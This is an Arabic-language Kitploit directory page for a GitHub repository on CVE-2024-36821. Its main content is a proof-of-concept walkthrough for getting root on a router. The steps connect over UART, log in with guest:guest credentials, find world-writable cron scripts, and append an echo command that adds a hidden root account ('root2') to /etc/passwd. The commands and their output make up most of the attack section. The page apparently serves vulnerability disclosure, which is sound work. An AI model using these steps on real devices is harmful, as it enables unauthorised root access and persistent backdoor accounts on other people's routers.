Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36821 — المرجع العام الذي يحتوي على الحد الأدنى من المعلومات المطلوبة للثغرة الأمنية المُغطاة بـ CVE-2024-36821 | Kitploit
أدوات/GitHubGitHub/ivanglinkin/cve-2024-36821
أمان الأنظمة المدمجةتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمان الأجهزة وإنترنت الأشياء
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

المرجع العام الذي يحتوي على الحد الأدنى من المعلومات المطلوبة للثغرة الأمنية المُغطاة بـ CVE-2024-36821

عرض المستودع
32منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-36821

المرجع العام الذي يحتوي على الحد الأدنى من المعلومات المطلوبة للثغرة التي يغطيها CVE-2024-36821

الفيديو الأصلي مع إثبات المفهوم (PoC) يمكنك العثور عليه على الفيديو -> https://www.youtube.com/watch?v=6vHno0ik7JY

إثبات المفهوم (PoC):

  1. الاتصال بجهاز التوجيه عبر اتصال UART

  2. باستخدام بيانات الاعتماد guest:guest، قم بتسجيل الدخول إلى النظام

  3. باستخدام الأمر find / -perm -777 -type f 2>/dev/null، ابحث عن الملفات التي لديها أذونات القراءة والكتابة والتنفيذ:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    لقطة شاشة 2024-06-10 في 20 00 50
  4. تحقق من المالك باستخدام الأمر ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh

  5. قم بتوليد كلمة المرور باستخدام الأمر openssl passwd Abracadabra

  6. قم بتعديل /tmp/cron/cron.everyminute/conntrack_collector.sh، وأضف كلمة المرور الجديدة المُولّدة إلى النهاية:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    لقطة شاشة 2024-06-10 في 20 05 05
  7. انتظر لمدة دقيقة

  8. بدّل المستخدم إلى root2 باستخدام الأمر التالي

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
تنزيل الأداة